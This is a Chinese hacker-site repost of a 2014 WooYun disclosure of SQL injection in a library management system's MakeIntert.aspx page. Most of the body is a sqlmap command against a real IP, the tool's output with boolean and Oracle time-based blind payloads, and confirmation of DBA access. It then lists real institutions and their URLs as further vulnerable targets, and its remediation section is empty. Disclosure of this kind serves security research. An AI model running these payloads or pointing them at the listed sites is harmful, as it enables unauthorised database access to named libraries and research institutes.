记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某通用图书馆管理系统SQL注入

2014-05-19 18:55

首先请检查一下,

WooYun: 某通用图书馆管理SQL注入(中科院计算技术研究所中招)

有可能是重复,如有雷同,请直接无视。。。我也是因为看到了这个,才想起来上学期期末发现的这个注射。

看了那个漏洞简介提到的中科院计算所,但发现好像没有我下面发现的这个注射页面。



sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 --is-dba



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: ID

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: ID=123 AND 7478=7478



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: ID=123 AND 9273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111)||CHR(105)||CHR(98),5)

---

[11:34:18] [INFO] the back-end DBMS is Oracle

web server operating system: Windows 2008 R2 or 7

web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727

back-end DBMS: Oracle

[11:34:18] [INFO] testing if current user is DBA

current user is DBA: True

[11:34:25] [INFO] fetched data logged to text files under '/Users/Leek/Desktop/sqlmap-dev/output/219.242.65.10'



DBA==True



漏洞证明:

在它的客户名单里测试了几个,

国家图书馆中央社会主义分馆:http://www.zysylib.org.cn/

中国科学院物理研究所:http://libiop.iphy.ac.cn/

中国科学院软研所:http://124.16.136.160:8083/iscas_lib/

还有各种大学用户,

中国矿业大学:http://219.242.65.10/fsweb/Default.aspx

华东交通大学:http://lib.ecjtu.jx.cn:80/gdweb

华北科技学院:http://211.81.174.140/

等等。只要存在MakeIntert.aspx这个页面一般可以注射。

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-051272

阅读:117569 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“某通用图书馆管理系统SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云